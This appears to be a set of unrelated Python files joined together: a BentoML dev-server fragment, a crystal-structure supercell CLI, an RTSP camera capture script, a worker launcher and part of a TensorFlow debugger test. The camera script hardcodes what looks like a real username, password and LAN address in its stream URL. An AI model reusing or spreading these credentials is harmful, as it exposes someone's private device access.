def run(path, interrupt_event):
my_env = os.environ.copy()
my_env["FLASK_ENV"] = "development"
cmd = [sys.executable, "-m", "bentoml", "serve", "--debug"]
if port:
cmd += ['--port', f'{port}']
if enable_microbatch:
cmd += ['--enable-microbatch']
if enable_ngrok:
cmd += ['--run-with-ngrok']
cmd += [path]
p = subprocess.Popen(
cmd,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
env=my_env,
)
threading.Thread(target=print_log, args=(p,), daemon=True).start()
interrupt_event.wait()
p.terminate()
self._dev_server_interrupt_event = multiprocessing.Event()
self._dev_server_process = multiprocessing.Process(
target=run,
args=(
self._dev_server_bundle_path.name,
self._dev_server_interrupt_event,
),
daemon=True,
)
self._dev_server_process.start()
logger.info(f"======= starting dev server on port: {port} =======")
except Exception as e: # pylint: disable=broad-except
self.stop_dev_server(skip_log=True)
raise e
def stop_dev_server(self, skip_log=False):
if self._dev_server_interrupt_event:
self._dev_server_interrupt_event.set()
self._dev_server_interrupt_event = None
if self._dev_server_process:
self._dev_server_process.join()
assert not self._dev_server_process.is_alive()
self._dev_server_process = None
elif not skip_log:
logger.warning("No dev server is running.")
if self._dev_server_bundle_path:
self._dev_server_bundle_path.cleanup()
self._dev_server_bundle_path = None
def __del__(self):
self.stop_dev_server(skip_log=True)
def infer_pip_dependencies_map(self):
if not self.pip_dependencies_map:
self.pip_dependencies_map = {}
bento_service_module = sys.modules[self.__class__.__module__]
if hasattr(bento_service_module, "__file__"):
bento_service_py_file_path = bento_service_module.__file__
reqs, unknown_modules = seek_pip_packages(bento_service_py_file_path)
self.pip_dependencies_map.update(reqs)
for module_name in unknown_modules:
logger.warning(
"unknown package dependency for module: %s", module_name
)
# Reset bentoml to configured deploy version - this is for users using
# customized BentoML branch for development but use a different stable
# version for deployment
#
# For example, a BentoService created with local dirty branch will fail
# to deploy with docker due to the version can't be found on PyPI, but
# get_bentoml_deploy_version gives the user the latest released PyPI
# version that's closest to the `dirty` branch
self.pip_dependencies_map['bentoml'] = get_bentoml_deploy_version()
return self.pip_dependencies_map
|
rexpand.py
|
# -*- coding: utf-8 -*-
import click
import time
import threading
import sys
from sagar.crystal.derive import cells_nonredundant, ConfigurationGenerator
from sagar.io.vasp import read_vasp, write_vasp
from sagar.crystal.structure import symbol2number as s2n
CONTEXT_SETTINGS = dict(help_option_names=['-h', '--help'])
@click.group(context_settings=CONTEXT_SETTINGS)
def cli():
pass
@cli.command('cell', short_help="Expanding primitive cell to specific range of volumes.")
@click.argument('pcell_filename', metavar='<primitive_cell_file>',
type=click.Path(exists=True, resolve_path=True, readable=True, file_okay=True))
@click.option('--comment', '-c', type=str, default='cell',
help="identifier (first word) of output files, Defualt='cell'.")
@click.option('--dimension', '-d', type=int, default=3,
help="Dimension of the system, 2 for slab. Defalut=3 for crystal")
@click.option('--volume', '-v', nargs=2, type=int, metavar='<min> <max>',
help="Expand primitive cell to supercell of volume <min> to <max>, set <min> as -1 for creating only <max> volume expanded supercells")
@click.option('--symprec', '-s', type=float, default=1e-5,
help="Symmetry precision to decide the symmetry of primitive cell. Default=1e-5")
@click.option('--comprec', '-p', type=float, default=1e-5,
help="Compare precision to judging if supercell is redundant. Defalut=1e-5")
@click.option('--verbose', '-vvv', is_flag=True, metavar='',
help="Will print verbose messages.")
def cell(pcell_filename, comment, dimension, volume, symprec, comprec, verbose):
"""
<primitive_cell_file> Primitive cell structure file, now only vasp POSCAR version5 supported.
"""
pcell = read_vasp(pcell_filename)
(min_v, max_v) = volume
if min_v == -1:
click.echo("Expanding primitive to volume {:d}".format(max_v))
_export_supercell(pcell, comment, dimension, max_v, symprec, comprec, verbose)
else:
for v in range(min_v, max_v + 1):
click.echo("Expanding primitive to volume {:d}".format(v))
_export_supercell(pcell, comment, dimension, v, symprec, comprec, verbose)
def _export_supercell(pcell, comment, dimension, v, symprec, comprec, verbose):
spinner = Spinner()
# spinner.start()
cells = cells_nonredundant(
pcell, v, dimension, symprec=symprec, comprec=comprec)
for idx, c in enumerate(cells):
if verbose:
print(" " + "No.{:d}: Processing".format(idx))
filename = '{:s}_v{:d}_id{:d}'.format(comment, v, idx)
write_vasp(c, filename)
# spinner.stop()
@cli.command('conf', short_help="Generating configurations in grid cells or supercells.")
@click.argument('cell_filename', metavar="<parent_cell_filename>")
@click.option('--comment', '-c', type=str, default='confs')
@click.option('--pmode', '-mp', type=click.Choice(['varv', 'svc', 'sc']), default='sc',
help="[varv|svc|sc] represent ['variable volume cells'|'specific volume cells'|'specific cell'] respectively. Deciding what kinds of parent cell to be used to getting configurations")
@click.option('--cmode', '-mc', type=click.Choice(['vc', 'cc']), default='cc',
help="[vc|cc] for 'variable concentration' and 'certain concentration' respectively.")
@click.option('--dimension', '-d', type=int, default=3,
help="Dimension of the system, 2 for slab. Defalut=3 for crystal")
@click.option('--volume', '-v', nargs=2, type=int, metavar='<min> <max>',
help="Expand primitive cell to supercell and to generate configurations of volume <min> to <max>, set <min> as -1 for creating only <max> volume expanded supercells. ONLY USED WHEN --pmode=[varv|svc]")
@click.option('--element', '-e', type=str, metavar='<symbol of element>',
help="Symbol of element of original sites")
@click.option('--substitutes', '-s', type=str, multiple=True, metavar='<symbol of element>',
help="Symbol of element to be disorderd substituting, 'Vac' for empty position aka vacancy, multiple optione supported for multielement alloy")
@click.option('--number', '-n', type=int, multiple=True,
help="number of substitutes element, only used when --cmode=cc")
@click.option('--symprec', type=float, default=1e-5,
help="Symmetry precision to decide the symmetry of cells. Default=1e-5")
@click.option('--comprec', type=float, default=1e-5,
help="Compare precision to judging if supercell is redundant. Defalut=1e-5")
@click.option('--verbose', '-vvv', is_flag=True, metavar='',
help="Will print verbose messages.")
def conf(cell_filename, comment, pmode, cmode, dimension, volume, element, substitutes, number, symprec, comprec, verbose):
"""
    <parent_cell_file> is the parent cell used to generate configurations by site disorder.\n
    A non-primitive cell can only be used as the argument when '--pmode=sc'.\n
    The command line tool only provides a configuration generator for element disorder; for more flexible usage such as site-specific disorder, please see the documentation at http:// , or use the python library directly.
"""
cell = read_vasp(cell_filename)
cg = ConfigurationGenerator(cell, symprec)
if pmode == 'varv' and cmode == 'vc':
click.secho("Expanding and generating configurations: ")
click.secho(
"(may take much time)", blink=True, bold=True, bg='magenta', fg='white')
spinner = Spinner()
spinner.start()
(min_v, max_v) = volume
if min_v == -1:
min_v = 1
sites = _get_sites(list(cell.atoms), element, substitutes)
confs = cg.cons_max_volume(
sites, max_v, min_volume=min_v, dimension=dimension, symprec=symprec)
for idx, c in enumerate(confs):
c = c.get_primitive_cell()
filename = '{:s}_id{:d}'.format(comment, idx)
write_vasp(c, filename)
spinner.stop()
click.secho("DONE", bold=True, bg='green', fg='white')
elif pmode == 'svc' and cmode == 'vc':
click.secho("Expanding and generating configurations: ")
click.secho(
"(may take much time)", blink=True, bold=True, bg='magenta', fg='white')
spinner = Spinner()
spinner.start()
(min_v, max_v) = volume
sites = _get_sites(list(cell.atoms), element, substitutes)
confs = cg.cons_specific_volume(
sites, volume=max_v, e_num=None, dimension=dimension, symprec=symprec)
f_deg = open('deg.txt', 'a')
for idx, (c, d) in enumerate(confs):
filename = '{:s}_id{:d}'.format(comment, idx)
write_vasp(c, filename)
deg_line = filename + '{:10d}'.format(d) + '\n'
f_deg.write(deg_line)
f_deg.close()
spinner.stop()
click.secho("DONE", bold=True, bg='green', fg='white')
elif pmode == 'svc' and cmode == 'cc':
click.secho("Expanding and generating configurations: ")
click.secho(
"(may take much time)", blink=True, bold=True, bg='magenta', fg='white')
spinner = Spinner()
spinner.start()
(min_v, max_v) = volume
l_atoms = cell.atoms.tolist()
sites = _get_sites(l_atoms, element, substitutes)
# number to enum
ele_n = s2n(element)
e_total = l_atoms.count(ele_n) * max_v
        e_n = e_total - sum(number)  # count of the first (original) element
        e_num = [e_n] + list(number)  # counts of every element
confs = cg.cons_specific_volume(
sites, volume=max_v, e_num=e_num, dimension=dimension, symprec=symprec)
f_deg = open('deg.txt', 'a')
for idx, (c, d) in enumerate(confs):
filename = '{:s}_id{:d}'.format(comment, idx)
write_vasp(c, filename)
deg_line = filename + '{:10d}'.format(d) + '\n'
f_deg.write(deg_line)
f_deg.close()
spinner.stop()
click.secho("DONE", bold=True, bg='green', fg='white')
elif pmode == 'sc' and cmode == 'vc':
click.secho("Generating configurations: ")
click.secho(
"(may take much time)", blink=True, bold=True, bg='magenta', fg='white')
spinner = Spinner()
spinner.start()
l_atoms = cell.atoms.tolist()
sites = _get_sites(l_atoms, element, substitutes)
confs = cg.cons_specific_cell(sites, None, symprec=symprec)
f_deg = open('deg.txt', 'a')
for idx, (c, d) in enumerate(confs):
filename = '{:s}_id{:d}'.format(comment, idx)
write_vasp(c, filename)
# import pdb; pdb.set_trace()
deg_line = filename + '{:10d}'.format(d) + '\n'
f_deg.write(deg_line)
f_deg.close()
spinner.stop()
click.secho("DONE", bold=True, bg='green', fg='white')
elif pmode == 'sc' and cmode == 'cc':
click.secho("Generating configurations: ")
click.secho(
"(may take much time)", blink=True, bold=True, bg='magenta', fg='white')
spinner = Spinner()
spinner.start()
l_atoms = cell.atoms.tolist()
sites = _get_sites(l_atoms, element, substitutes)
# number to enum
ele_n = s2n(element)
e_total = l_atoms.count(ele_n)
        e_n = e_total - sum(number)  # count of the first (original) element
        e_num = [e_n] + list(number)  # counts of every element
confs = cg.cons_specific_cell(sites, e_num, symprec=symprec)
f_deg = open('deg.txt', 'a')
# TODO f.close()
for idx, (c, d) in enumerate(confs):
filename = '{:s}_id{:d}'.format(comment, idx)
write_vasp(c, filename)
deg_line = filename + '{:10d}'.format(d) + '\n'
f_deg.write(deg_line)
f_deg.close()
spinner.stop()
click.secho("DONE", bold=True, bg='green', fg='white')
else:
click.secho("ERROR: --pmode={:s} --cmode={:s} not supported.".format(
pmode, cmode), bold=True, bg='red', fg='white')
def _get_sites(l_atoms, ele, l_sub):
ele_n = s2n(ele)
l_sub_n = [s2n(sub_n) for sub_n in l_sub]
sites = []
for a in l_atoms:
if a == ele_n:
sites.append(tuple([a] + l_sub_n))
else:
sites.append(tuple([a]))
return sites
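# Illustrative sketch (assumption: s2n maps an element symbol to its atomic
# number, e.g. s2n('Si') -> 14, s2n('Ge') -> 32). For atoms [14, 14, 8] with
# element 'Si' and substitutes ('Ge',):
#
#     _get_sites([14, 14, 8], 'Si', ('Ge',))
#     # -> [(14, 32), (14, 32), (8,)]
#
# Substitutable sites carry the original species plus every allowed
# substitute; all other sites carry only themselves.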
class Spinner:
busy = False
delay = 0.1
@staticmethod
def spinning_cursor():
while True:
for cursor in '|/-\\':
yield cursor
def __init__(self, delay=None):
self.spinner_generator = self.spinning_cursor()
if delay and float(delay):
self.delay = delay
def spinner_task(self):
while self.busy:
sys.stdout.write(next(self.spinner_generator))
sys.stdout.flush()
time.sleep(self.delay)
sys.stdout.write('\b')
sys.stdout.flush()
def start(self):
self.busy = True
threading.Thread(target=self.spinner_task).start()
def stop(self):
self.busy = False
time.sleep(self.delay)
|
platform.py
|
import multiprocessing as mp
import cv2
import time
import msvcrt
def handleRtspVideo(id, q):
#cap = cv2.VideoCapture("rtsp://%s:%s@%s//Streaming/Channels/%d" % (name, pwd, ip, channel))
cap = cv2.VideoCapture(id)
while True:
is_opened, frame = cap.read()
# push the frame only when the capture succeeded; when the queue backs up,
# drop the oldest frame so the consumer always works on a recent image
q.put(frame) if is_opened else None
q.get() if q.qsize() > 1 else None
def handleDisplayVideo(q, p):
#cv2.namedWindow(window_name, flags=cv2.WINDOW_FREERATIO)
while True:
frame = q.get()
cv2.imshow('Test', frame)
p.put(frame)
p.get() if p.qsize() > 1 else None
cv2.waitKey(1)
def handleFaceRecognition(p):
while True:
frame = p.get()
time.sleep(1)
print("process one image")
print("Done")
def runSingleCamera(idlist): # single camera
mp.set_start_method(method='spawn') # init
imgqueues = [mp.Queue(maxsize=2), mp.Queue(maxsize=2)]
processes = [mp.Process(target=handleRtspVideo, args=(idlist[0], imgqueues[0],)),
mp.Process(target=handleDisplayVideo, args=(imgqueues[0], imgqueues[1])),
mp.Process(target=handleFaceRecognition, args=(imgqueues[1],))]
[setattr(process, "daemon", True) for process in processes] # process.daemon = True
[process.start() for process in processes]
[process.join() for process in processes]
# def runMultiCamera(idlist):
# user_name, user_pwd = "admin", "password"
# camera_ip_l = [
# "192.168.1.169",
# "192.168.1.170",
# ]
# mp.set_start_method(method='spawn') # init
# queues = [mp.Queue(maxsize=2) for _ in camera_ip_l]
# processes = []
# for queue, camera_ip in zip(queues, camera_ip_l):
# processes.append(mp.Process(target=queue_img_put, args=(queue, user_name, user_pwd, camera_ip)))
# processes.append(mp.Process(target=queue_img_get, args=(queue, camera_ip)))
# [setattr(process, "daemon", True) for process in processes] # process.daemon = True
# [process.start() for process in processes]
# [process.join() for process in processes]
if __name__ == '__main__':
rtsp_url = ['rtsp://Jerry:Alrac2018!@192.168.1.64:554/h265/ch1/main/av_stream']
runSingleCamera(rtsp_url)
# run_multi_camera(rtsp_url)
|
slave_starter.py
|
import sys, os, time, json
sys.path.append(os.getcwd())
from material_process.clip.clip_master import ClipMaster
from material_process.clip.clip_worker import ClipWorker
from material_process.audio.audio_master import AudioMaster
from material_process.audio.audio_worker import AudioWorker
from material_process.image.image_master import ImageMaster
from multiprocessing import Process
with open(os.getcwd() + "/material_process/config.json", 'r') as f0:
info = json.load(f0)
SERVER_IP = info["master_ip"]
class Starter(object):
@staticmethod
def clip_master():
clip_master = ClipMaster()
clip_master.listen()
@staticmethod
def clip_worker():
time.sleep(5)
clip_worker = ClipWorker(SERVER_IP)
clip_worker.start()
@staticmethod
def audio_master():
audio_master = AudioMaster()
audio_master.listen()
@staticmethod
def audio_worker():
time.sleep(5)
audio_worker = AudioWorker(SERVER_IP)
audio_worker.start()
@staticmethod
def image_master():
image_master = ImageMaster()
image_master.listen()
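# Note: this starter only launches the worker processes below; the masters are
# presumably started elsewhere (e.g. on the host at SERVER_IP), and the
# 5-second sleep in each worker gives them time to come up before connecting.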
if __name__ == '__main__':
st = Starter()
p2 = Process(target=st.clip_worker)
p4 = Process(target=st.audio_worker)
p2.start()
p4.start()
print("开始启动")
|
dumping_callback_test.py
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Unit tests for tfdbg v2 dumping callback."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import shutil
import socket
import tempfile
import threading
from absl.testing import parameterized
import numpy as np
from tensorflow.core.protobuf import debug_event_pb2
from tensorflow.python.debug.lib import debug_events_reader
from tensorflow.python.debug.lib import dumping_callback
from tensorflow.python.debug.lib import dumping_callback_test_lib
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
_host_name = socket.gethostname()
_current_file_full_path = os.path.abspath(__file__)
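# A minimal sketch of the dump-and-read pattern these tests exercise (using
# only the calls that appear below; `dump_root` stands for any writable
# directory, the tests use a tempdir):
#
#     writer = dumping_callback.enable_dump_debug_info(
#         dump_root, tensor_debug_mode="FULL_TENSOR")
#     ...  # run eager ops or tf.functions
#     writer.FlushNonExecutionFiles()
#     writer.FlushExecutionFiles()
#     with debug_events_reader.DebugDataReader(dump_root) as reader:
#         reader.update()
#         executions = reader.executions()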
class DumpingCallbackTest(
dumping_callback_test_lib.DumpingCallbackTestBase, parameterized.TestCase):
def setUp(self):
super(DumpingCallbackTest, self).setUp()
self.dump_root = tempfile.mkdtemp()
def tearDown(self):
if os.path.isdir(self.dump_root):
shutil.rmtree(self.dump_root, ignore_errors=True)
dumping_callback.disable_dump_debug_info()
super(DumpingCallbackTest, self).tearDown()
def _verifyStackFrames(self, stack_frames):
"""Verify the correctness of the stack frames.
Currently, it simply asserts that the current file is found in the stack
frames.
TODO(cais): Perhaps implement a stricter check later.
Args:
stack_frames: The stack frames to verify.
"""
self.assertTrue([
frame for frame in stack_frames if frame[0] == _current_file_full_path])
def _expectedDefaultDeviceName(self):
gpu_name = test_util.gpu_device_name()
if gpu_name:
return "/job:localhost/replica:0/task:0" + gpu_name
else:
return "/job:localhost/replica:0/task:0/device:CPU:0"
def testInvalidTensorDebugModeCausesError(self):
with self.assertRaisesRegexp(
ValueError,
r"Invalid value in tensor_debug_mode \(\'NONSENSICAL\'\).*"
r"Valid options.*NO_TENSOR.*"):
dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NONSENSICAL")
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("CurtHealth", "CURT_HEALTH"),
("ConciseHealth", "CONCISE_HEALTH"),
("Shape", "SHAPE"),
("FulHealth", "FULL_HEALTH"),
("FullTensor", "FULL_TENSOR"),
)
def testEnableDumpDebugInfoLogsTensorDebugModeAsStringName(self,
tensor_debug_mode):
log_messages = []
def fake_logging_info(*args):
log_messages.append(args)
with test.mock.patch.object(
tf_logging, "info", side_effect=fake_logging_info):
dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
self.assertLen(log_messages, 1)
self.assertIn(self.dump_root, log_messages[0])
self.assertIn(tensor_debug_mode, log_messages[0])
def testDisablingTracingCallbackWithoutEnablingFirstIsTolerated(self):
dumping_callback.disable_dump_debug_info()
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("CurtHealth", "CURT_HEALTH"),
("ConciseHealth", "CONCISE_HEALTH"),
("Shape", "SHAPE"),
("FullHealth", "FULL_HEALTH"),
("FullTensor", "FULL_TENSOR"),
)
def testPureEagerOpExecution(self, tensor_debug_mode):
"""Test dumping data from eager op execution: float32."""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
x = constant_op.constant(10.0)
zero = constant_op.constant(0.0)
one = constant_op.constant(1.0)
two = constant_op.constant(2.0)
three = constant_op.constant(3.0)
# Use Collatz conjecture as a test case.
while x > one:
if math_ops.equal(x % two, zero):
x = x / two
else:
x = x * three + one
writer.FlushNonExecutionFiles()
self._readAndCheckMetadataFile()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
# Before FlushExecutionFiles() is called, the .execution file should be
# empty.
self.assertFalse(reader.executions())
# After the flushing, the .execution file should hold the appropriate
# contents.
writer.FlushExecutionFiles()
reader.update()
executions = reader.executions()
prev_wall_time = 1
executed_op_types = []
tensor_values = collections.defaultdict(lambda: [])
for execution in executions:
self.assertGreaterEqual(execution.wall_time, prev_wall_time)
prev_wall_time = execution.wall_time
executed_op_types.append(execution.op_type)
# Check the device name.
if execution.op_type in ("AddV2", "Mul", "RealDiv"):
self.assertLen(execution.output_tensor_device_ids, 1)
self.assertEqual(
reader.device_name_by_id(execution.output_tensor_device_ids[0]),
self._expectedDefaultDeviceName(),
"Unexpected device name from eager op %s" % execution.op_type)
# No graph IDs should have been logged for eager op executions.
self.assertFalse(execution.graph_id)
self.assertTrue(execution.input_tensor_ids)
self.assertTrue(execution.output_tensor_ids)
self.assertEqual(
debug_event_pb2.TensorDebugMode.keys()[execution.tensor_debug_mode],
tensor_debug_mode)
if tensor_debug_mode == "NO_TENSOR":
# Due to the NO_TENSOR tensor debug mode, tensor_protos ought to
# be empty.
self.assertFalse(execution.debug_tensor_values)
elif tensor_debug_mode == "CURT_HEALTH":
self.assertLen(execution.debug_tensor_values, 1)
if execution.op_type in ("AddV2", "Mul", "RealDiv"):
# 1st element: -1 is the unset tensor_id for eager op execution.
# 2nd element: 0 means there is no inf or nan.
self.assertAllClose(execution.debug_tensor_values, [[-1.0, 0.0]])
elif tensor_debug_mode == "CONCISE_HEALTH":
if execution.op_type in ("AddV2", "Mul", "RealDiv"):
# 1st element: -1 is the unset tensor_id for eager op execution.
# 2nd element: each scalar tensor has 1 element.
# Remaining elements: no -inf, inf or nan in these
self.assertAllClose(
execution.debug_tensor_values, [[-1, 1, 0, 0, 0]])
elif tensor_debug_mode == "FULL_HEALTH":
if execution.op_type in ("AddV2", "Mul", "RealDiv"):
# Elements: [
# -1 is the unset tensor_id for eager op execution,
# device ID (set to -1 for now),
# dtype, rank, element_count,
# neg_inf_count, pos_inf_count, nan_count
# neg_finite_count, zero_count, pos_finite_count]
self.assertAllClose(
execution.debug_tensor_values,
[[-1, -1, 1, 0, 1, 0, 0, 0, 0, 0, 1]])
elif tensor_debug_mode == "SHAPE":
if execution.op_type in ("AddV2", "Mul", "RealDiv"):
# 1st element: -1 is the unset tensor_id for eager op execution.
# 2nd element: dtype enum value (float32).
# 3rd element: rank (scalar).
# 4th element: element count (1).
# Remaining elements: shape at fixed length (6).
self.assertAllClose(execution.debug_tensor_values,
[[-1, 1, 0, 1, 0, 0, 0, 0, 0, 0]])
elif tensor_debug_mode == "FULL_TENSOR":
tensor_values[execution.op_type].append(
reader.execution_to_tensor_values(execution)[0])
host_name, stack_frames = reader.read_execution_stack_trace(execution)
self.assertEqual(host_name, _host_name)
self._verifyStackFrames(stack_frames)
if tensor_debug_mode == "FULL_TENSOR":
self.assertAllClose(tensor_values["Greater"], [1, 1, 1, 1, 1, 1, 0])
self.assertAllClose(tensor_values["RealDiv"], [5, 8, 4, 2, 1])
self.assertAllClose(tensor_values["Mul"], [15])
self.assertAllClose(tensor_values["AddV2"], [16])
self.assertEqual(
executed_op_types,
[
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 10 --> 5
"Greater",
"FloorMod",
"Equal",
"Mul",
"AddV2", # 5 --> 16
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 16 --> 8
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 8 --> 4
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 4 --> 2
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 2 --> 1
"Greater"
])
# Due to the pure eager op execution, the .graph file and the
# .graph_execution_traces file ought to be empty.
self.assertFalse(reader.outermost_graphs())
self.assertEqual(reader.num_graph_execution_traces(), 0)
@parameterized.named_parameters(
("CurtHealth", "CURT_HEALTH"),
("ConciseHealth", "CONCISE_HEALTH"),
("FullHealth", "FULL_HEALTH"),
("Shape", "SHAPE"),
)
@test_util.run_in_graph_and_eager_modes
def testModesSummarizingBadNumericalValue(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
@def_function.function
def func(x, y):
return (x + y) / (x - y)
x = np.array([-3, -1, 0, 0, 1, 1, 1, 2], dtype=np.float16)
y = np.array([2, -1, 0, 0, 1, 1, 1, 3], dtype=np.float16)
# x - y = [-5, 0, 0, 0, 0, 0, 0, -1]
# (x + y) / (x - y) = [0.2, -inf, nan, nan, inf, inf, inf, -5].
self.evaluate(func(x, y))
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
graph_exec_traces = reader.graph_execution_traces()
executed_op_types = [trace.op_type for trace in graph_exec_traces
if trace.op_type != "Const"]
self.assertCountEqual(
executed_op_types,
["Placeholder", "Placeholder", "AddV2", "Sub", "RealDiv"])
if tensor_debug_mode == "CURT_HEALTH":
for trace in graph_exec_traces:
# 1st element: tensor_id, should be >= 0.
# 2nd element: indicates if there is any inf or nan.
tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
self.assertGreaterEqual(tensor_id, 0)
if trace.op_type == "RealDiv":
self.assertAllClose(trace.debug_tensor_value, [tensor_id, 1])
else:
self.assertAllClose(trace.debug_tensor_value, [tensor_id, 0])
elif tensor_debug_mode == "CONCISE_HEALTH":
for trace in graph_exec_traces:
# 1st element: tensor_id, should be >= 0.
# 2nd element: element count (8).
# Remaining 3 elements: The counts of -inf, inf and nan.
tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
self.assertGreaterEqual(tensor_id, 0)
if trace.op_type == "RealDiv":
self.assertAllClose(trace.debug_tensor_value,
[tensor_id, 8, 1, 3, 2])
else:
self.assertAllClose(trace.debug_tensor_value,
[tensor_id, 8, 0, 0, 0])
elif tensor_debug_mode == "FULL_HEALTH":
for trace in graph_exec_traces:
# Elements: [
# -1 is the unset tensor_id for eager op execution,
# device ID (set to -1 for now),
# dtype, rank, element_count,
# neg_inf_count, pos_inf_count, nan_count
# neg_finite_count, zero_count, pos_finite_count]
tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
self.assertGreaterEqual(tensor_id, 0)
if trace.op_type == "RealDiv":
self.assertAllClose(trace.debug_tensor_value,
[tensor_id, -1, 19, 1, 8, 1, 3, 2, 1, 0, 1])
elif trace.op_type == "Sub":
self.assertAllClose(trace.debug_tensor_value,
[tensor_id, -1, 19, 1, 8, 0, 0, 0, 2, 6, 0])
else: # SHAPE.
for trace in graph_exec_traces:
# 1st element: tensor_id, should be >= 0.
# 2nd element: dtype enum value (float16 = 19).
# 3rd element: rank (1)
# 4th element: element count (8).
# Remaining elements: shape at fixed length (6).
tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
self.assertGreaterEqual(tensor_id, 0)
self.assertAllClose(trace.debug_tensor_value,
[tensor_id, 19, 1, 8, 8, 0, 0, 0, 0, 0])
@parameterized.named_parameters(
("CurtHealth", "CURT_HEALTH"),
("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testConstTensorsAreCaptured(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
@def_function.function
def times_two_plus_three(x):
return x * constant_op.constant(2.0) + constant_op.constant(3.0)
self.assertAllEqual(
self.evaluate(times_two_plus_three(10.0)), 23.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
const_traces = [trace for trace in reader.graph_execution_traces()
if trace.op_type == "Const"]
self.assertGreaterEqual(len(const_traces), 3)
if tensor_debug_mode == "CURT_HEALTH":
# Under CURT_HEALTH, each debug tensor value has the form
# [tensor_id, has_inf_or_nan].
self.assertLen(const_traces[0].debug_tensor_value, 2)
self.assertEqual(const_traces[0].debug_tensor_value[1], 0)
self.assertLen(const_traces[1].debug_tensor_value, 2)
self.assertEqual(const_traces[1].debug_tensor_value[1], 0)
self.assertLen(const_traces[2].debug_tensor_value, 2)
self.assertEqual(const_traces[2].debug_tensor_value[1], 0)
else: # FULL_TENSOR.
const_tensor_values = [
reader.graph_execution_trace_to_tensor_value(const_trace)
for const_trace in const_traces]
# Avoid making assertion on the particular order of the debug tensors
# for the three Consts because it may be indeterminate.
self.assertIn(10.0, const_tensor_values)
self.assertIn(2.0, const_tensor_values)
self.assertIn(3.0, const_tensor_values)
@parameterized.named_parameters(
("Shape", "SHAPE"),
)
@test_util.run_in_graph_and_eager_modes
def testBooleanTensors(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
@def_function.function
def func(x, y):
return math_ops.logical_not(math_ops.logical_and(x, y))
x = np.array([[False, False], [True, True]], dtype=np.bool)
y = np.array([[False, True], [False, True]], dtype=np.bool)
self.assertAllEqual(
self.evaluate(func(x, y)), [[True, True], [True, False]])
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
graph_exec_traces = reader.graph_execution_traces()
executed_op_types = [trace.op_type for trace in graph_exec_traces
if trace.op_type != "Const"]
self.assertEqual(
executed_op_types,
["Placeholder", "Placeholder", "LogicalAnd", "LogicalNot"])
for trace in graph_exec_traces:
tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
self.assertGreaterEqual(tensor_id, 0)
# 1st element: tensor_id, should be >= 0.
# 2nd element: dtype enum value (bool).
# 3rd element: rank (2).
# 4th element: element count (4).
# Remaining elements: shape at fixed length.
self.assertAllClose(
trace.debug_tensor_value, [tensor_id, 10, 2, 4, 2, 2, 0, 0, 0, 0])
def testListingSourceFiles(self):
writer = dumping_callback.enable_dump_debug_info(self.dump_root)
# Run a simple eager execution event, so that the source files are dumped.
self.assertAllClose(math_ops.truediv(7.0, 1.0 / 6.0), 42.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
source_file_list = reader.source_file_list()
self.assertIsInstance(source_file_list, tuple)
for item in source_file_list:
self.assertIsInstance(item, tuple)
self.assertLen(item, 2)
self.assertIn((_host_name, _current_file_full_path), source_file_list)
def testReadingSourceLines(self):
writer = dumping_callback.enable_dump_debug_info(self.dump_root)
# Run a simple eager execution event, so that the source-file contents are
# dumped.
self.assertAllClose(math_ops.truediv(7.0, 1.0 / 6.0), 42.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
with open(_current_file_full_path, "rt") as f:
file_lines = f.read().split("\n")
self.assertEqual(
reader.source_lines(_host_name, _current_file_full_path), file_lines)
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("CurtHealth", "CURT_HEALTH"),
("ConciseHealth", "CONCISE_HEALTH"),
("FullHealth", "FULL_HEALTH"),
("Shape", "SHAPE"),
